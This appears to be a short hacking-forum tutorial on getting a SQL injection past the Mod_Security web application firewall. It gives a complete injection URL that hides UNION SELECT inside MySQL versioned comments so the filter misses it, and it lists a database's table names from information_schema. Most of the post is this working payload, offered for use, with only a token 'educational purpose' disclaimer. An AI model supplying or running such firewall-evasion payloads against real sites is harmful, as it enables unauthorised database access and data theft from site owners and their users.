[TUTORIAL] Mod_Security bypass (SQLi)

Salam all.

Today i will show you how to bypass Mod_Security WAF for SQLi attack.
Probably, most of you did querie UNION SELECT 1,2,3,4... etc and saw message like "Not Acceptable!"
Take a look at following picture:

[Image: LJCfl5M.jpg]
This message is generated by WAF called Mod_Security and here is solution how you can bypass this WAF:

http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

Hope this will be Help fuLL 

NOTE: This is for educational purpose, any illegal activities through this is on your own risk.